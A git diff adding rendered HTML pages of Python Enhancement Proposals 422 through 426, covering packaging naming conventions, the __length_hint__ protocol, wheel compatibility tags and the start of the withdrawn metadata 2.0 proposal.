Such behaviour initially appears to be potentially useful for the +new __autodecorate__ hook, as it would allow __autodecorate__ +methods to readily be used as explicit decorators on other classes.

+

However, that apparent support would be an illusion as it would only work +correctly if invoked on a subclass, in which case the method can just as +readily be retrieved from the subclass and called that way. Unlike +__new__, there’s no issue with potentially changing method signatures at +different points in the inheritance chain.

+
+
+

Passing in the namespace directly rather than a factory function

+

At one point, this PEP proposed that the class namespace be passed +directly as a keyword argument, rather than passing a factory function. +However, this encourages an unsupported behaviour (that is, passing the +same namespace to multiple classes, or retaining direct write access +to a mapping used as a class namespace), so the API was switched to +the factory function version.

+
+
+
+

Reference Implementation

+

A reference implementation for __autodecorate__ has been posted to the +issue tracker. It uses the original __init_class__ naming, does not yet +allow the implicit decorator to replace the class with a different object, and +does not implement the suggested namespace parameter for +type.__prepare__.

+
+
+

TODO

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0422.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0423/index.html b/pep-0423/index.html new file mode 100644 index 00000000000..e2d102e619e --- /dev/null +++ b/pep-0423/index.html @@ -0,0 +1,861 @@ + + + + + + + + PEP 423 – Naming conventions and recipes related to packaging | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 423 – Naming conventions and recipes related to packaging

+
+
Author:
+
Benoit Bryon <benoit at marmelune.net>
+
Discussions-To:
+
Distutils-SIG list
+
Status:
+
Deferred
+
Type:
+
Informational
+
Topic:
+
Packaging
+
Created:
+
24-May-2012
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This document deals with:

+
    +
  • names of Python projects,
  • +
  • names of Python packages or modules being distributed,
  • +
  • namespace packages.
  • +
+

It provides guidelines and recipes for distribution authors:

+ +
+
+

PEP Deferral

+

Further consideration of this PEP has been deferred at least until after +PEP 426 (package metadata 2.0) and related updates have been resolved.

+
+
+

Terminology

+

Reference is packaging terminology in Python documentation.

+
+
+

Relationship with other PEPs

+
    +
  • PEP 8 +deals with code style guide, including names of Python +packages and modules. It covers syntax of package/modules names.
  • +
  • PEP 345 deals with packaging metadata, and defines name argument +of the packaging.core.setup() function.
  • +
  • PEP 420 deals with namespace packages. It brings support of +namespace packages to Python core. Before, namespace packages were +implemented by external libraries.
  • +
  • PEP 3108 deals with the transition between Python 2.x and Python 3.x +as applied to the standard library: some modules are to be deleted, some are to be +renamed. It points out that naming conventions matter and is an +example of a transition plan.
  • +
+
+
+

Overview

+

Here is a summarized list of guidelines you should follow to choose +names:

+ +
+
+

If in doubt, ask

+

If you feel unsure after reading this document, ask the Python +community on IRC or on a mailing list.

+
+
+

Top-level namespace relates to code ownership

+

This helps avoid clashes between project names.

+

Ownership could be:

+
    +
  • an individual. +Example: gp.fileupload is owned and maintained by Gael +Pasgrimaud.
  • +
  • an organization. +Examples:
      +
    • zest.releaser is owned and maintained by Zest Software.
    • +
    • Django is owned and maintained by the Django Software +Foundation.
    • +
    +
  • +
  • a group or community. +Example: sphinx is maintained by developers of the Sphinx +project, not only by its author, Georg Brandl.
  • +
  • a group or community related to another package. +Example: collective.recaptcha is owned by its author: David +Glick, Groundwire. But the “collective” namespace is owned by the Plone +community.
  • +
+
+

Respect ownership

+

Understand the purpose of a namespace before you use it.

+

Don’t plug into a namespace you don’t own, unless explicitly +authorized.

+

If in doubt, ask.

+

As an example, don’t plug into the “django.contrib” namespace because it is +managed by Django’s core contributors.

+

Exceptions can be defined by project authors. See Organize community +contributions below.

+

Also, this rule applies to non-Python projects.

+

As an example, don’t use “apache” as top-level namespace: “Apache” is +the name of an existing project (in the case of “Apache”, it is also a +trademark).

+
+
+

Private (including closed-source) projects use a namespace

+

… because private projects are owned by somebody. So apply the +ownership rule.

+

For internal/customer projects, use your company name as the +namespace.

+

This rule applies to closed-source projects.

+

As an example, if you are creating a “climbing” project for the +“Python Sport” company, use the “pythonsport.climbing” name, even if it is +closed source.

+
+
+

Individual projects use a namespace

+

… because they are owned by individuals. So apply the +ownership rule.

+

There is no shame in releasing a project as open source even if it has +an “internal” or “individual” name.

+

If the project comes to a point where the author wants to change +ownership (i.e. the project no longer belongs to an individual), keep +in mind it is easy to rename the project.

+
+
+

Community-owned projects can avoid namespace packages

+

If your project is generic enough (i.e. it is not a contrib to another +product or framework), you can avoid namespace packages. The base +condition is generally that your project is owned by a group (i.e. the +development team) which is dedicated to this project.

+

Only use a “shared” namespace if you really intend the code to be +community owned.

+

As an example, sphinx project belongs to the Sphinx development +team. There is no need to have some “sphinx” namespace package with +only one “sphinx.sphinx” project inside.

+
+
+

In doubt, use an individual/organization namespace

+

If your project is really experimental, best choice is to use an +individual or organization namespace:

+
    +
  • it allows projects to be released early.
  • +
  • it won’t block a name if the project is abandoned.
  • +
  • it doesn’t block future changes. When a project becomes mature and +there is no reason to keep individual ownership, it remains +possible to rename the project.
  • +
+
+
+
+

Use a single name

+

Distribute only one package (or only one module) per project, and use +package (or module) name as project name.

+
    +
  • It avoids possible confusion between project name and distributed +package or module name.
  • +
  • It makes the name consistent.
  • +
  • It is explicit: when one sees the project name, one can guess the +package/module name, and vice versa.
  • +
  • It also limits implicit clashes between package/module names. +By using a single name, when you register a project name to PyPI, +you also perform a basic package/module name availability +verification.

    As an example, pipeline, python-pipeline and +django-pipeline all distribute a package or module called +“pipeline”. So installing two of them leads to errors. This issue +wouldn’t have occurred if these distributions used a single name.

    +
  • +
+

Yes:

+
    +
  • Package name: “kheops.pyramid”, +i.e. import kheops.pyramid
  • +
  • Project name: “kheops.pyramid”, +i.e. pip install kheops.pyramid
  • +
+

No:

+
    +
  • Package name: “kheops”
  • +
  • Project name: “KheopsPyramid”
  • +
+
+

Note

+

For historical reasons, PyPI contains many distributions where +project and distributed package/module names differ.

+
+
+

Multiple packages/modules should be rare

+

Technically, Python distributions can provide multiple packages and/or +modules. See setup script reference for details.

+

Some distributions actually do. +As an example, setuptools and distribute are both declaring +“pkg_resources”, “easy_install” and “site” modules in addition to +respective “setuptools” and “distribute” packages.

+

Consider this use case as exceptional. In most cases, you don’t need +this feature. So a distribution should provide only one package or +module at a time.

+
+
+

Distinct names should be rare

+

A notable exception to the Use a single name rule is when you +explicitly need distinct names.

+

As an example, the Pillow project provides an alternative to the +original PIL distribution. Both projects distribute a “PIL” +package.

+

Consider this use case as exceptional. In most cases, you don’t need +this feature. So a distributed package name should be equal to project +name.

+
+
+
+

Follow PEP 8 for syntax of package and module names

+

PEP 8 applies to names of Python packages and modules.

+

If you Use a single name, PEP 8 +also applies to project names. +The exceptions are namespace packages, where dots are required in +the project name.

+
+
+

Pick memorable names

+

One important thing about a project name is that it be memorable.

+

As an example, celery is not a meaningful name. At first, it is not +obvious that it deals with message queuing. But it is memorable, +partly because it can be used to feed a RabbitMQ server.

+
+
+

Pick meaningful names

+

Ask yourself “how would I describe in one sentence what this name is +for?”, and then “could anyone have guessed that by looking at the +name?”.

+

As an example, DateUtils is a meaningful name. It is obvious that +it deals with utilities for dates.

+

When you are using namespaces, try to make each part meaningful.

+
+
+

Use packaging metadata

+

Consider project names as unique identifiers on PyPI:

+
    +
  • it is important that these identifiers remain human-readable.
  • +
  • it is even better when these identifiers are meaningful.
  • +
  • but the primary purpose of identifiers is not to classify or +describe projects.
  • +
+

Classifiers and keywords metadata are made for categorization of +distributions. Summary and description metadata are meant to +describe the project.

+

As an example, there is a “Framework :: Twisted” classifier. Even +if the names are quite heterogeneous (they don’t follow a particular +pattern), we can still retrieve the full list by filtering on that +classifier.

+

In order to Organize community contributions, conventions about +names and namespaces matter, but conventions about metadata should be +even more important.

+

As an example, we can find Plone portlets in many places:

+
    +
  • plone.portlet.*
  • +
  • collective.portlet.*
  • +
  • collective.portlets.*
  • +
  • collective.*.portlets
  • +
  • some vendor-related projects such as “quintagroup.portlet.cumulus”
  • +
  • and even projects where “portlet” pattern doesn’t appear in the +name.
  • +
+

Even if the Plone community has conventions, using the name to categorize +distributions is inappropriate. It’s impossible to get the full list of +distributions that provide portlets for Plone by filtering on names. +But it would be possible if all these distributions used the +“Framework :: Plone” classifier and the “portlet” keyword.

+
+
+

Avoid deep nesting

+

The Zen of Python says “Flat is better than nested”.

+
+

Two levels is almost always enough

+

Don’t define everything in deeply nested hierarchies: you will end up +with projects and packages like “pythonsport.common.maps.forest”. This +type of name is both verbose and cumbersome (e.g. if you have many +imports from the package).

+

Furthermore, big hierarchies tend to break down over time as the +boundaries between different packages blur.

+

The consensus is that two levels of nesting are preferred.

+

For example, we have plone.principalsource instead of +plone.source.principal or something like that. The name is +shorter, the package structure is simpler, and there would be very +little to gain from having three levels of nesting here. It would be +impractical to try to put all “core Plone” sources (a source is a kind +of vocabulary) into the plone.source.* namespace, in part because +some sources are part of other packages, and in part because sources +already exist in other places. Had we made a new namespace, it would +be inconsistently used from the start.

+

Yes: “pyranha”

+

Yes: “pythonsport.climbing”

+

Yes: “pythonsport.forestmap”

+

No: “pythonsport.maps.forest”

+
+
+

Use only one level for ownership

+

Don’t use 3 levels to set individual/organization ownership in +a community namespace.

+

As an example, let’s consider:

+
    +
  • you are plugging into a community namespace, such as “collective”.
  • +
  • and you want to add a more restrictive “ownership” level, to avoid +clashes inside the community.
  • +
+

In such a case, you’d better use the most restrictive ownership +level as the first level.

+

As an example, where “collective” is a major community namespace that +“gergovie” belongs to, and “vercingetorix” is the name of the author of +“gergovie”:

+

No: “collective.vercingetorix.gergovie”

+

Yes: “vercingetorix.gergovie”

+
+
+

Don’t use namespace levels for categorization

+

Use packaging metadata instead.

+
+
+

Don’t use more than 3 levels

+

Technically, you can create deeply nested hierarchies. However, in +most cases, you shouldn’t need it.

+
+

Note

+

Even communities where namespaces are standard don’t use more than +3 levels.

+
+
+
+ +
+

Register names with PyPI

+

PyPI is the central place for distributions in the Python community. +So, it is also the place to register project and package names.

+

See Registering with the Package Index for details.

+
+
+

Recipes

+

The following recipes will help you follow the guidelines and +conventions above.

+
+

How to check for name availability?

+

Before you choose a project name, make sure it hasn’t already been +registered in the following locations:

+
    +
  • PyPI
  • +
  • that’s all. PyPI is the only official place.
  • +
+

As an example, you could also check in various locations such as +popular code hosting services, but keep in mind that PyPI is the only +place where you can register names in the Python community.

+

That’s why it is important you register names with PyPI.

+

Also make sure the names of distributed packages or modules haven’t +already been registered:

+ +

The use a single name rule also helps you avoid clashes with +package names: if a project name is available, then the package name +has good chances to be available too.
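
As a quick local complement to checking PyPI, the following sketch detects clashes with anything importable in the current environment (standard library or installed distributions):

import importlib

def module_name_is_taken(name):
    """Return True if importing `name` already succeeds."""
    try:
        importlib.import_module(name)
    except ImportError:
        return False
    return True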

+
+
+

How to rename a project?

+

Renaming a project is possible, but keep in mind that it will cause +some confusion. So, pay particular attention to the README and +documentation, so that users understand what happened.

+
    +
  1. First of all, do not remove legacy distributions from PyPI. +Because some users may be using them.
  2. +
  3. Copy the legacy project, then change names (project and +package/module). Pay attention to, at least:
      +
    • packaging files,
    • +
    • folder name that contains source files,
    • +
    • documentation, including README,
    • +
    • import statements in code.
    • +
    +
  4. +
  5. Assign Obsoletes-Dist metadata to the new distribution in the setup.cfg +file (see the sketch after this list). See PEP 345 about Obsoletes-Dist +and the setup.cfg +specification.
  6. +
  7. Release a new version of the renamed project, then publish it.
  8. +
  9. Edit legacy project:
      +
    • add dependency to new project,
    • +
    • drop everything except packaging stuff,
    • +
    • add the Development Status :: 7 - Inactive classifier in +setup script,
    • +
    • publish a new release.
    • +
    +
  10. +
+
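
Here is a hedged sketch of the metadata involved in the steps above, reusing the illustrative “vercingetorix.gergovie” names from earlier; the distutils/setuptools obsoletes keyword shown is the closest legacy spelling of PEP 345’s Obsoletes-Dist field:

# setup.py of the *renamed* project (all names illustrative)
from setuptools import setup

setup(
    name='vercingetorix.gergovie',
    version='1.0',
    obsoletes=['collective.vercingetorix.gergovie'],  # legacy name
)

# setup.py of the *legacy* project's final release (a separate file):
# an empty distribution that pulls in the new name and flags itself
# as inactive.
setup(
    name='collective.vercingetorix.gergovie',
    version='2.0',
    install_requires=['vercingetorix.gergovie'],
    classifiers=['Development Status :: 7 - Inactive'],
)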

So, users of the legacy package:

+
    +
  • can continue using the legacy distributions at a deprecated version,
  • +
  • can upgrade to last version of legacy distribution, which is +empty…
  • +
  • … and automatically download new distribution as a dependency of +the legacy one.
  • +
+

Users who discover the legacy project see it is inactive.

+
+

Improved handling of renamed projects on PyPI

+

If many projects follow Renaming howto +recipe, then many legacy distributions will have the following +characteristics:

+
    +
  • Development Status :: 7 - Inactive classifier.
  • +
  • latest version is empty, except packaging stuff.
  • +
  • latest version “redirects” to another distribution. E.g. it has a +single dependency on the renamed project.
  • +
  • referenced as Obsoletes-Dist in a newer distribution.
  • +
+

So it will be possible to detect renamed projects and improve +readability on PyPI, so that users can focus on active distributions. +But this feature is not required now; there is no urgency. It won’t be +covered in this document.

+
+
+
+

How to apply naming guidelines on existing projects?

+

There is no obligation for existing projects to be renamed. The +choice is left to project authors and maintainers for obvious reasons.

+

However, project authors are invited to:

+ +
+

State about current naming

+

The important thing, at first, is that you state your current +choices:

+
    +
  • Ask yourself “why did I choose the current name?”, then document it.
  • +
  • If there are differences with the guidelines provided in this +document, you should tell your users.
  • +
  • If possible, create issues in the project’s bugtracker, at least for +record. Then you are free to resolve them later, or maybe mark them +as “wontfix”.
  • +
+

Projects that are meant to receive contributions from community should +also organize community contributions.

+
+
+

Promote migrations

+

Every Python developer should migrate whenever possible, or promote +the migrations in their respective communities.

+

Apply these guidelines on your projects, then the community will see +it is safe.

+

In particular, “leaders” such as authors of popular projects are +influential, they have power and, thus, responsibility over +communities.

+

Apply these guidelines on popular projects, then communities will +adopt the conventions too.

+

Projects should promote migrations when they release a new (major) +version, particularly if this version introduces support for +Python 3.x, the new standard library packaging, or namespace packages.

+
+
+

Opportunity

+

As Python 3.3 is being developed:

+
    +
  • many projects are not Python 3.x compatible. It includes “big” +products or frameworks. It means that many projects will have to do +a migration to support Python 3.x.
  • +
  • packaging (aka distutils2) is on the starting blocks. When it is +released, projects will be invited to migrate and use new packaging.
  • +
  • PEP 420 brings official support of namespace packages to Python.
  • +
+

It means that most active projects should be about to migrate in the +next year(s) to support Python 3.x, new packaging or new namespace +packages.

+

Such an opportunity is unique and won’t come again soon! +So let’s introduce and promote naming conventions as soon as possible +(i.e. now).

+
+
+
+
+

References

+

Additional background:

+ +

References and footnotes:

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0423.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0424/index.html b/pep-0424/index.html new file mode 100644 index 00000000000..f962250d871 --- /dev/null +++ b/pep-0424/index.html @@ -0,0 +1,197 @@ + + + + + + + + PEP 424 – A method for exposing a length hint | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 424 – A method for exposing a length hint

+
+
Author:
+
Alex Gaynor <alex.gaynor at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
14-Jul-2012
+
Python-Version:
+
3.4
+
Post-History:
+
15-Jul-2012
+
+
+
+
+
+

Abstract

+

CPython currently defines a __length_hint__ method on several +types, such as various iterators. This method is then used by various +other functions (such as list) to presize lists based on the +estimate returned by __length_hint__. Types which are not sized, +and thus should not define __len__, can then define +__length_hint__, to allow estimating or computing a size (such as +many iterators).

+
+
+

Specification

+

This PEP formally documents __length_hint__ for other interpreters +and non-standard-library Python modules to implement.

+

__length_hint__ must return an integer (else a TypeError is +raised) or NotImplemented, and is not required to be accurate. It +may return a value that is either larger or smaller than the actual +size of the container. A return value of NotImplemented indicates +that there is no finite length estimate. It may not return a negative +value (else a ValueError is raised).

+

In addition, a new function operator.length_hint is added, with the following semantics (which define how __length_hint__ should be used):

+
def length_hint(obj, default=0):
+    """Return an estimate of the number of items in obj.
+
+    This is useful for presizing containers when building from an
+    iterable.
+
+    If the object supports len(), the result will be
+    exact. Otherwise, it may over- or under-estimate by an
+    arbitrary amount. The result will be an integer >= 0.
+    """
+    try:
+        return len(obj)
+    except TypeError:
+        try:
+            get_hint = type(obj).__length_hint__
+        except AttributeError:
+            return default
+        try:
+            hint = get_hint(obj)
+        except TypeError:
+            return default
+        if hint is NotImplemented:
+            return default
+        if not isinstance(hint, int):
+            raise TypeError("Length hint must be an integer, not %r" %
+                            type(hint))
+        if hint < 0:
+            raise ValueError("__length_hint__() should return >= 0")
+        return hint
+
+
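+
For illustration, a sketch of a custom iterator that supplies an estimate, and of how operator.length_hint consumes it (the class name and the sizes here are invented for this example):
+
import operator
+
+class CountdownIter:
+    """An iterator that knows roughly how many items remain."""
+    def __init__(self, n):
+        self.n = n
+    def __iter__(self):
+        return self
+    def __next__(self):
+        if self.n <= 0:
+            raise StopIteration
+        self.n -= 1
+        return self.n
+    def __length_hint__(self):
+        # Only an estimate; accuracy is not required
+        return self.n
+
+print(operator.length_hint(CountdownIter(10)))  # 10, from __length_hint__
+print(operator.length_hint(object(), 5))        # 5, the supplied default
+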
+
+
+

Rationale

+

Being able to pre-allocate lists based on the expected size, as +estimated by __length_hint__, can be a significant optimization. +CPython has been observed to run some code faster than PyPy, purely +because of this optimization being present.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0424.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ \ No newline at end of file
diff --git a/pep-0425/index.html b/pep-0425/index.html new file mode 100644 index 00000000000..4e1af52b1cc --- /dev/null +++ b/pep-0425/index.html @@ -0,0 +1,398 @@
+ PEP 425 – Compatibility Tags for Built Distributions | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 425 – Compatibility Tags for Built Distributions

+
+
Author:
+
Daniel Holth <dholth at gmail.com>
+
BDFL-Delegate:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
27-Jul-2012
+
Python-Version:
+
3.4
+
Post-History:
+
08-Aug-2012, 18-Oct-2012, 15-Feb-2013
+
Resolution:
+
Python-Dev message
+
+
+
+
+
+

Attention

+

This PEP is a historical document. The up-to-date, canonical spec, Platform compatibility tags, is maintained on the PyPA specs page.

+


+

See the PyPA specification update process for how to propose changes.

+
+
+

Abstract

+

This PEP specifies a tagging system to indicate with which versions of +Python a built or binary distribution is compatible. A set of three +tags indicate which Python implementation and language version, ABI, +and platform a built distribution requires. The tags are terse because +they will be included in filenames.

+
+
+

PEP Acceptance

+

This PEP was accepted by Alyssa Coghlan on 17th February, 2013.

+
+
+

Rationale

+

Today “python setup.py bdist” generates the same filename on PyPy +and CPython, but an incompatible archive, making it inconvenient to +share built distributions in the same folder or index. Instead, built +distributions should have a file naming convention that includes enough +information to decide whether or not a particular archive is compatible +with a particular implementation.

+

Previous efforts come from a time where CPython was the only important +implementation and the ABI was the same as the Python language release. +This specification improves upon the older schemes by including the Python +implementation, language version, ABI, and platform as a set of tags.

+

By comparing the tags it supports with the tags listed by the +distribution, an installer can make an educated decision about whether +to download a particular built distribution without having to read its +full metadata.

+
+
+

Overview

+

The tag format is {python tag}-{abi tag}-{platform tag}

+
+
python tag
‘py27’, ‘cp33’
+
abi tag
‘cp32dmu’, ‘none’
+
platform tag
‘linux_x86_64’, ‘any’
+
+

For example, the tag py27-none-any indicates compatibility with Python 2.7 (any Python 2.7 implementation) with no ABI requirement, on any platform.

+
+
+

Use

+

The wheel built package format includes these tags in its filenames, +of the form {distribution}-{version}(-{build tag})?-{python tag}-{abi +tag}-{platform tag}.whl. Other package formats may have their own +conventions.

+
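+
As a sketch of consuming that convention (assuming, for simplicity, that neither the distribution name nor the version contains a hyphen; real tools escape such hyphens):
+
def parse_wheel_filename(filename):
+    # '{distribution}-{version}(-{build tag})?-{python}-{abi}-{platform}.whl'
+    parts = filename[:-len('.whl')].split('-')
+    distribution, version = parts[0], parts[1]
+    build_tag = parts[2] if len(parts) == 6 else None
+    python_tag, abi_tag, platform_tag = parts[-3:]
+    return distribution, version, build_tag, (python_tag, abi_tag, platform_tag)
+
+print(parse_wheel_filename('pip-1.3.1-py2.py3-none-any.whl'))
+# ('pip', '1.3.1', None, ('py2.py3', 'none', 'any'))
+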
+
+

Details

+
+

Python Tag

+

The Python tag indicates the implementation and version required by +a distribution. Major implementations have abbreviated codes, initially:

+
    +
  • py: Generic Python (does not require implementation-specific features)
  • +
  • cp: CPython
  • +
  • ip: IronPython
  • +
  • pp: PyPy
  • +
  • jy: Jython
  • +
+

Other Python implementations should use sys.implementation.name.

+

The version is py_version_nodot. CPython gets away with no dot, but if one is needed the underscore _ is used instead. PyPy should probably use its own versions here, e.g. pp18, pp19.

+

The version can be just the major version 2 or 3 py2, py3 for +many pure-Python distributions.

+

Importantly, major-version-only tags like py2 and py3 are not +shorthand for py20 and py30. Instead, these tags mean the packager +intentionally released a cross-version-compatible distribution.

+

A single-source Python 2/3 compatible distribution can use the compound +tag py2.py3. See Compressed Tag Sets, below.

+
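+
As an illustrative sketch (not part of the specification), the Python tag for the running interpreter could be derived as follows; the abbreviation table mirrors the list above, and sys.implementation requires Python 3.3+:
+
import sys
+
+_IMPL_ABBREVS = {'cpython': 'cp', 'ironpython': 'ip', 'pypy': 'pp', 'jython': 'jy'}
+
+def python_tag():
+    # Abbreviated implementation name plus py_version_nodot
+    # (assumes single-digit version components, as was typical at the time)
+    impl = _IMPL_ABBREVS.get(sys.implementation.name, sys.implementation.name)
+    return '{0}{1}{2}'.format(impl, *sys.version_info[:2])
+
+print(python_tag())  # e.g. 'cp33' on CPython 3.3
+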
+
+

ABI Tag

+

The ABI tag indicates which Python ABI is required by any included +extension modules. For implementation-specific ABIs, the implementation +is abbreviated in the same way as the Python Tag, e.g. cp33d would be +the CPython 3.3 ABI with debugging.

+

The CPython stable ABI is abi3 as in the shared library suffix.

+

Implementations with a very unstable ABI may use the first 6 bytes (as +8 base64-encoded characters) of the SHA-256 hash of their source code +revision and compiler flags, etc, but will probably not have a great need +to distribute binary distributions. Each implementation’s community may +decide how to best use the ABI tag.

+
+
+

Platform Tag

+

The platform tag is simply distutils.util.get_platform() with all +hyphens - and periods . replaced with underscore _.

+
    +
  • win32
  • +
  • linux_i386
  • +
  • linux_x86_64
  • +
+
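+
A minimal sketch of that normalisation (the helper name is invented):
+
import distutils.util
+
+def platform_tag():
+    # Replace '-' and '.' so the tag is safe inside '-'-delimited filenames
+    return distutils.util.get_platform().replace('-', '_').replace('.', '_')
+
+print(platform_tag())  # e.g. 'linux-x86_64' becomes 'linux_x86_64'
+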
+
+
+

Use

+

The tags are used by installers to decide which built distribution +(if any) to download from a list of potential built distributions. +The installer maintains a list of (pyver, abi, arch) tuples that it +will support. If the built distribution’s tag is in the list, then +it can be installed.

+

It is recommended that installers try to choose the most feature complete +built distribution available (the one most specific to the installation +environment) by default before falling back to pure Python versions +published for older Python releases. Installers are also recommended to +provide a way to configure and re-order the list of allowed compatibility +tags; for example, a user might accept only the *-none-any tags to only +download built packages that advertise themselves as being pure Python.

+

Another desirable installer feature might be to include “re-compile from +source if possible” as more preferable than some of the compatible but +legacy pre-built options.

+

This example list is for an installer running under CPython 3.3 on a +linux_x86_64 system. It is in order from most-preferred (a distribution +with a compiled extension module, built for the current version of +Python) to least-preferred (a pure-Python distribution built with an +older version of Python):

+
    +
  1. cp33-cp33m-linux_x86_64
  2. cp33-abi3-linux_x86_64
  3. cp3-abi3-linux_x86_64
  4. cp33-none-linux_x86_64*
  5. cp3-none-linux_x86_64*
  6. py33-none-linux_x86_64*
  7. py3-none-linux_x86_64*
  8. cp33-none-any
  9. cp3-none-any
  10. py33-none-any
  11. py3-none-any
  12. py32-none-any
  13. py31-none-any
  14. py30-none-any
  +
    +
  • Built distributions may be platform specific for reasons other than C +extensions, such as by including a native executable invoked as +a subprocess.
  • +
+

Sometimes there will be more than one supported built distribution for a +particular version of a package. For example, a packager could release +a package tagged cp33-abi3-linux_x86_64 that contains an optional C +extension and the same distribution tagged py3-none-any that does not. +The index of the tag in the supported tags list breaks the tie, and the +package with the C extension is installed in preference to the package +without because that tag appears first in the list.

+
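+
A sketch of that selection rule (helper names invented; candidates pair a filename with its tag, and earlier entries in the supported list win):
+
def best_candidate(candidates, supported_tags):
+    # candidates: iterable of (filename, tag) pairs for one release
+    rank = {tag: index for index, tag in enumerate(supported_tags)}
+    viable = [(rank[tag], name) for name, tag in candidates if tag in rank]
+    return min(viable)[1] if viable else None
+
Under the example list above, a build tagged cp33-abi3-linux_x86_64 would be chosen over one tagged py3-none-any, because its tag appears earlier in the list.
+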
+
+

Compressed Tag Sets

+

To allow for compact filenames of bdists that work with more than +one compatibility tag triple, each tag in a filename can instead be a +‘.’-separated, sorted, set of tags. For example, pip, a pure-Python +package that is written to run under Python 2 and 3 with the same source +code, could distribute a bdist with the tag py2.py3-none-any. +The full list of simple tags is:

+
def iter_simple_tags(pytag, abitag, archtag):
+    # Expand each '.'-separated tag set into the full list of simple tags
+    for x in pytag.split('.'):
+        for y in abitag.split('.'):
+            for z in archtag.split('.'):
+                yield '-'.join((x, y, z))
+
+
+
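+
For example, the pip tag above expands to exactly two simple tags:
+
print(list(iter_simple_tags('py2.py3', 'none', 'any')))
+# ['py2-none-any', 'py3-none-any']
+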

A bdist format that implements this scheme should include the expanded +tags in bdist-specific metadata. This compression scheme can generate +large numbers of unsupported tags and “impossible” tags that are supported +by no Python implementation e.g. “cp33-cp31u-win64”, so use it sparingly.

+
+
+

FAQ

+
+
What tags are used by default?
Tools should use the most-preferred architecture dependent tag +e.g. cp33-cp33m-win32 or the most-preferred pure python tag +e.g. py33-none-any by default. If the packager overrides the +default it indicates that they intended to provide cross-Python +compatibility.
+
What tag do I use if my distribution uses a feature exclusive to the newest version of Python?
Compatibility tags aid installers in selecting the most compatible +build of a single version of a distribution. For example, when +there is no Python 3.3 compatible build of beaglevote-1.2.0 +(it uses a Python 3.4 exclusive feature) it may still use the +py3-none-any tag instead of the py34-none-any tag. A Python +3.3 user must combine other qualifiers, such as a requirement for the +older release beaglevote-1.1.0 that does not use the new feature, +to get a compatible build.
+
Why isn’t there a . in the Python version number?
CPython has lasted 20+ years without a 3-digit major release. This +should continue for some time. Other implementations may use _ as +a delimiter, since both - and . delimit the surrounding filename.
+
Why normalise hyphens and other non-alphanumeric characters to underscores?
To avoid conflicting with the “.” and “-” characters that separate +components of the filename, and for better compatibility with the +widest range of filesystem limitations for filenames (including +being usable in URL paths without quoting).
+
Why not use special character <X> rather than “.” or “-“?
Either because that character is inconvenient or potentially confusing +in some contexts (for example, “+” must be quoted in URLs, “~” is +used to denote the user’s home directory in POSIX), or because the +advantages weren’t sufficiently compelling to justify changing the +existing reference implementation for the wheel format defined in PEP +427 (for example, using “,” rather than “.” to separate components +in a compressed tag).
+
Who will maintain the registry of abbreviated implementations?
New two-letter abbreviations can be requested on the python-dev +mailing list. As a rule of thumb, abbreviations are reserved for +the current 4 most prominent implementations.
+
Does the compatibility tag go into METADATA or PKG-INFO?
No. The compatibility tag is part of the built distribution’s +metadata. METADATA / PKG-INFO should be valid for an entire +distribution, not a single build of that distribution.
+
Why didn’t you mention my favorite Python implementation?
The abbreviated tags facilitate sharing compiled Python code in a +public index. Your Python implementation can use this specification +too, but with longer tags. +Recall that all “pure Python” built distributions just use ‘py’.
+
Why is the ABI tag (the second tag) sometimes “none” in the reference implementation?
Since Python 2 does not have an easy way to get to the SOABI +(the concept comes from newer versions of Python 3) the reference +implementation at the time of writing guesses “none”. Ideally it +would detect “py27(d|m|u)” analogous to newer versions of Python, +but in the meantime “none” is a good enough way to say “don’t know”.
+
+
+
+

+
+
+

Acknowledgements

+

The author thanks Paul Moore, Alyssa Coghlan, Marc Abramowitz, and +Mr. Michele Lacchia for their valuable help and advice.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0425.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ \ No newline at end of file
diff --git a/pep-0426/index.html b/pep-0426/index.html new file mode 100644 index 00000000000..e5b3f0c5bc3 --- /dev/null +++ b/pep-0426/index.html @@ -0,0 +1,1522 @@
+ PEP 426 – Metadata for Python Software Packages 2.0 | peps.python.org
+
+


+ + +
+
+
+

PEP 426 – Metadata for Python Software Packages 2.0

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>, +Daniel Holth <dholth at gmail.com>, +Donald Stufft <donald at stufft.io>
+
BDFL-Delegate:
+
Donald Stufft <donald at stufft.io>
+
Discussions-To:
+
Distutils-SIG list
+
Status:
+
Withdrawn
+
Type:
+
Informational
+
Topic:
+
Packaging
+
Requires:
+
440, 508, 518
+
Created:
+
30-Aug-2012
+
Post-History:
+
14-Nov-2012, 05-Feb-2013, 07-Feb-2013, 09-Feb-2013, +27-May-2013, 20-Jun-2013, 23-Jun-2013, 14-Jul-2013, +21-Dec-2013
+
Replaces:
+
345
+
Superseded-By:
+
566
+
+
+
+
+
+

Attention

+

This PEP is a historical document. The up-to-date, canonical spec, Core metadata specifications, is maintained on the PyPA specs page.

+


+

See the PyPA specification update process for how to propose changes.

+
+
+

Important

+

This PEP has been withdrawn.

+


+

The ground-up metadata redesign proposed in this PEP has been withdrawn in +favour of the more modest proposal in PEP 566, which retains the basic +Key:Value format of previous metadata versions, but also defines a standardised +mechanism for translating that format to nested JSON-compatible data structures.

+

